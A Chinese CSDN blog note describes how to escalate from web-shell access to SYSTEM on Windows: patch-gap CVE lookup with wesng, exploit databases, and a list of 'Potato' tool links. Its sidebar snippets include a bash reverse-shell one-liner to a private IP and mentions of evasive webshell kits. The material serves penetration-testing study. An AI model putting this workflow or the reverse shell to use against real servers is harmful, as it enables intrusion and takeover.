windows web提权

于 2024-05-29 12:02:19 发布
阅读量698 收藏 14
点赞数 35
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyw268/article/details/139285044
版权

#Web到Win-系统提权-人工操作

如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用

优点:解决实时更新不集成的EXP

缺点:操作繁琐,需要各种复现调试

 

1、信息收集

参考常见命令(见上图)

2.补丁筛选

1.https://i.hacking8.com/tiquan 

在cmd输入systeminfo命令把得到的结果放到里面可以查询可利用的cve

2.https://github.com/bitsadmin/wesng

python wes.py systeminfo.txt 

把systeminfo的信息复制粘贴到一个文本 用这个工具跑可以获得可利用的cve

python wes.py systeminfo.txt  -i "Elevation of Privilege" -o 1.csv

在cve中挑选权限提升的 把结果生成在本地

3、EXP获取执行

KernelHub 针对常用溢出编号指定找EXP

Poc-in-Github 针对年份及编号指定找EXP

exploitdb 针对类型及关键说明指定找EXP 

像是msf的漏洞数据库可以搜漏洞 不仅仅是提权

https://github.com/Ascotbe/Kernelhub

https://github.com/nomi-sec/PoC-in-GitHub

https://gitlab.com/exploit-database/exploitdb

4.#Web到Win-系统提权-土豆家族

https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w   //关于土豆 

土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,

可以将低权限的服务用户提升为“NT AUTHORITY\SYSTEM”特权。

1、Test in:Windows Server 2022 Datacenter(21H2)

GodPotato

https://github.com/BeichenDream/GodPotato

SweetPotato

https://github.com/CCob/SweetPotato

RoguePotato

https://github.com/antonioCoco/RoguePotato

BadPotato

https://github.com/BeichenDream/BadPotato

EfsPotato

https://github.com/zcgonvh/EfsPotato

MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato

CandyPotato

https://github.com/klezVirus/CandyPotato

RasmanPotato

https://github.com/crisprss/RasmanPotato

PetitPotato

https://github.com/wh0amitz/PetitPotato

JuicyPotatoNG

https://github.com/antonioCoco/JuicyPotatoNG

PrintNotifyPotato

https://github.com/BeichenDream/PrintNotifyPotato

CoercedPotato

https://github.com/Prepouce/CoercedPotato

爱敲键盘的pig
关注
  • 35
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
webshll工具包
12-02
webshll工具包 NC PR CMD Churrasco 工具全部已经免杀 无后门 webshll利器啊
windows服务器安全设置之
09-30
服务器的安全很重要,特别是被黑客,这里指的是用web进行web一般会用到 NETWORK SERVICE 帐号,和注册表的改动,于是我们把注册表的部分改为只读即可
WEB
forbidd3n,keep going
10-25 3406
本文转自《剑眉大侠笔记》,个人觉得思路想法很好,就转载了,其中蓝色字体为本人笔记 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 注:若net被禁用,可使用aio工具,可进行账户的克隆,该工具还有很多用户,请自行了解 2.当
升第一天-简单Web升&转移(1)
2401_83621426的博客
04-29 542
16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?使用目录扫描工具,扫出一个admin的路径,访问为后台。3、现在给你三百台服务器,你怎么对他们进行管理?
web
qq_40495877的博客
04-29 2038
这里利用冰蝎远程连接到了靶机上: 利用systeminfo查看靶机系统的补丁; 如果有限可以在靶机上创建txt文件保存,在用冰蝎下载下来,没有的话就复制粘贴到本地txt文件。 然后就利用本机下载的wesng去对比补丁库吧,命令如下: wesng目录下: python wes.py systeminfo.txt -o vuln.csv 对比结果保存为vuln.csv文件: 这里我们就有可利用的补丁漏洞了; 接下来用linux或者忍者系统去创建一个远程木马 命令行下: msfvenom -
Guest升方法总结
Another's story
07-31 2318
  现在的入侵是越来越难了,人们的安全意识都普遍高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。) 但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员限。比如我们通过某些对IIS的攻击,只
AI:web1
qq_39742838的博客
12-09 301
1.AI:web1前期端口扫描和sql注入不再了,教程也有很多,直接说。 2.傻傻的上传了一个php文件,想要反弹shell,bash -i >& /dev/tcp/192.168.133.128/4444 0>&1,监听4444端口,访问这个php文件,结果并没有结果,一定是姿势不对。 3.监听4444端口 在kali os-shell执行 py...
技术详解.pptx
09-03
了解这些基本概念和技巧,对于理解和应用技术至关重要,因为它们构成了Web服务器和应用程序的基础,同时也是攻击者可能利用的入口点。在网络安全环境中,对这些知识的掌握有助于识别和修复潜在的安全风险。
【菜鸟腾飞】简单的Getshell和windows_漏洞研究
11-01
【菜鸟腾飞】简单的Getshell和windows_漏洞研究【菜鸟腾飞】简单的Getshell和windows_漏洞研究
记一次绕过火绒安全实战案例1
08-03
绕过火绒安全实战案例1是指在 Windows 2008 R2 服务器上,绕过火绒安全软件的限制,获取服务器限的实战案例。该案例中,服务器上安装了多种安全防护软件,包括火绒、护卫神、安全狗等。为了获取服务器限,...
服务器安全狗,免费服务器安全软件,支持windows、linux系统,供防黑客攻击、防、防漏洞、防暴力破解、防篡改等
最新发布
05-26
 底层驱动防护,屏蔽入侵 驱动级保护,拦截更快速,有效防止未授的非法用户登录服务器,实时阻止非法创建和修改系统帐号。  服务器安全加固 避免配置风险 全面的服务器体检,暴露安全隐患,当前系统健康...
工具包webshell
06-27
工具包,这套工具还没弄下来就放弃把,遗憾的就是不免杀
webshell工具工具
11-26
web工具,一个好用的serv-u目录查看工具,哈哈哈哈哈哈哈哈
常用的工具集合(含CMD)
07-01
工具集合,包括FTP,SU,CMD,3389等工具
web思路
09-11 172
1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user 2.当成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚的用户登录进去就是system限,再试试一般就可以了。 3.cmd拒绝...
15.CTF-web安全
woo233的博客
09-29 1805
往往我们能拿下服务器的web服务只是具有低限用户(www-data),对于内网渗透,我们需要到root。Linux系统的过程不止涉及到了漏洞,也涉及了很多系统配置。:已经拿到低shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有限上传文件和下载文件。
web 小结
学习总结
06-28 1633
ASP SHELL流程详解 文章作者 enterer 博客 www.enterer.cn 转载请保留 呵呵,本文应该是《asp webshell限总结》的继续了吧。 文章导读: 本篇文章你可以看到1.本人经验与技巧 2.服务器的自己总结的流程 拿到webshell,确定了是什么限的,那么就可以开始了。 1.首先是最简单的system限下直接添加账号,和普通的CMD命令没有什么区别。这种机会还是很少的,基本我就遇到过2,3次。 此处失败进入2. 还有一个特别的,用asp代码来,不
Web的基本漏洞--
尽欢的博客
06-05 407
的介绍
渗透之——ASP Web
冰河的专栏
12-31 5297
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85475585 【 web 】 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当成功,3389没开的情况下,上...
windows2012
09-17
根据引用,Windows Server 2012的方法可以使用DLL劫持配合MSF-Web限。而根据引用,Windows Server 2012的过程可能需要等待高限用户NTLM认证的时间。另外,根据引用,在Windows Server 2012中,如果MySQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值